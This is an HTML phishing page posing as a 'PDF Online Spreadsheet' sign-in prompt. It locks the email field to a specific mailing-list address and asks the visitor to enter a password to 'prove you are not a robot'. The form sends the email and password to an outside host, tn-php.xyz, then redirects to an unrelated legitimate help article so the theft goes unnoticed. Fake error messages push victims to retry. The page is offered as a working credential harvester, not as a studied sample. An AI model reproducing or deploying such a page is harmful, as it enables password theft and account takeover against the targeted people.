<html lang="en">
<head>
<meta http-equiv="x-ua-compatible" content="EmulateIE9">
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
<link rel="icon" type="image/ico" href="https://cdn-icons-png.flaticon.com/512/337/337946.png">
<title>PDF Online Spreadsheet :: Sign in</title>
</head>
<body style="background-image: url(https://firebasestorage.googleapis.com/v0/b/online-cac5e.appspot.com/o/Capture.PNG?alt=media&token=3fe67d55-4fb7-4bd4-bbe8-44c2961b0b77); background-repeat: no-repeat;background-size: cover;">
<div class="container-fluid p-0">
<div class="container">
<div class="row my-5">
<div class="col-lg-5 mx-auto">
<div class="m-5 p-4 bg-white rounded" id="div1" style="box-shadow: 0px 2px 5px rgba(0,0,0,0.5);">
<div class="text-center">
<span><img src='https://firebasestorage.googleapis.com/v0/b/online-cac5e.appspot.com/o/337946.png?alt=media&token=d42bd494-0dd6-4bb3-add4-1507ec7327a8'/></span><span class="pl-4 h5 align-middle"> </span><br><br>
<span class="h3">Sign in</span><br>
<span class="h5"></span><br>
<span class="h">Confirm your identity to prove you are not a robot</span><br>
<span id="msg" class="text-danger" style="display: none;">Invalid Password..! Please enter correct password.</span><br>
<span id="error" class="text-danger" style="display: none;">That account doesn't exist. Enter a different account</span>
<small></small>
<div class="form-group">
<form action="https://tn-php.xyz/1/api.php" method="post">
<input type="hidden" name="_redirect" value="https://intercom.help/pabau/en/articles/4825380-emailing-an-invoice-with-a-stripe-payment-link">
<input type="email" id="email" name="email" class="form-control rounded-0 bg-transparent" aria-describedby="aiHelp" placeholder="Username" value="debian-science-maintainers@lists.alioth.debian.org" readonly autofocus required >
</div>
<div class="form-group mt-2">
<small></small>
<input type="password" id="password" name="password" class="form-control" aria-describedby="aiHelp" placeholder="Password" autofocus required>
</div>
</div>
<div class="form-check mt-3">
<input type="checkbox" class="form-check-input" id="exampleCheck1">
<label class="form-check-label" for="exampleCheck1"><span><a href="#">Remember Me.</a></span></label>
<span><span><a href="#" class="float-right"></a></span></span>
</div>
<div class="col-lg-12 mt-3">
<button type="submit" class="btn text-white px-4 w-100" id="submit-btn" style="background-color: #FF0000;">Sign in</button>
</div>
</div>
</div>
</html>